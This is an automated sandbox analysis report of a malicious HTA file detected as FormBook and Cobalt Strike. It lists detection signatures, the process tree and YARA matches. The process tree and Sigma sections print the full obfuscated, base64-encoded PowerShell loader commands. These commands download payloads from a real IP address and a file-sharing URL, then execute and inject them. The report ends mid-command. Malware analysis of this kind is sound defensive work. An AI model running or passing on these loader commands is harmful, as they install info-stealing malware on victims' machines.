Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seemebestgoodluckthings.hta

Overview

General Information

Sample name:seemebestgoodluckthings.hta
Analysis ID:1566470
MD5:46792b4c6325dfcc5943fb8912b50bcd
SHA1:b20380592ee042e7d232d4946e63cb5559cb0eda
SHA256:18a4b2fda9e31862ce0af8003ed1d5ab843d99f25e9e4fd5fb9f328c5cf0d5e6
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6592 cmdline: mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6020 cmdline: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3300 cmdline: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 3192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_compiler.exe (PID: 3512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
seemebestgoodluckthings.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Process Memory Space: powershell.exe PID: 6592JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            12.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            12.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              12.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

              Other

              SourceRuleDescriptionAuthorStrings
              amsi32_6592.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6592.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSg
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZX